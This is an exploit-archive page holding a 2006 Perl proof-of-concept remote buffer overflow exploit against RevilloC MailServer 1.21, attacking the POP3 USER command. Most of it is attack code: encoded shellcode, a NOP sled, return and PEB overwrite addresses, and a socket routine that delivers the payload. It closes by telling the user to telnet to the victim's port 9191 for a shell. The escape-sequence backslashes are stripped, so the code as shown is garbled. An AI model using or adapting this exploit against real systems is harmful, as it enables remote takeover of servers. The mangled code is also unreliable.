[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC
# Published : 2006-03-07
# Author : securma massine
# Previous Title : PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit
# Next Title : MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit
#!/usr/bin/perl -w
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
#The mail server is a central point for emails coming in and going out from home or office
#The service will work with any standard email client that supports POP3 and SMTP.
#by sending a large buffer after USER commands
#C:>nc 127.0.0.1 110
#+OK RevilloC POP3 Ready
#USER "A" x4081 + "xff"x4 + "xdd"x4 + "x0dx0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#ntdll!wcsncat+0x387:
#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "xdd"x4
#ECX dddddddd
#EAX FFFFFFFF
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for eductional, testing and demonstrating purpose only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w
use IO::Socket;
if ($#ARGV<0)
{
print "n write the target IP!! nn";
exit;
}
$shellcode = "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
"xD3x4Ax8Cx88";
$buffer = "x90"x3601;
$eax ="x83xb5x19x01"; # change if needed
$peb= "x20xf0xfdx7f"; #PEB lock
$user ="USER ";
$enter = "x0dx0a";
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"110"); unless ($connect) { die "cant connect" }
print "nRevilloC mail server remote PoC exploit by securma massinen";
print "nsecurma@morx.orgn";
print "n+++++++++++www.morx.org++++++++++++++++n";
$connect->recv($text,128);
print "$textn";
print "[+] Sent USERn";
$connect->send($user . $buffer . $shellcode . $eax . $peb . $enter);
print "[+] Sent shellcode..telnet to victim host port 9191n";
# www.Syue.com [2006-03-07]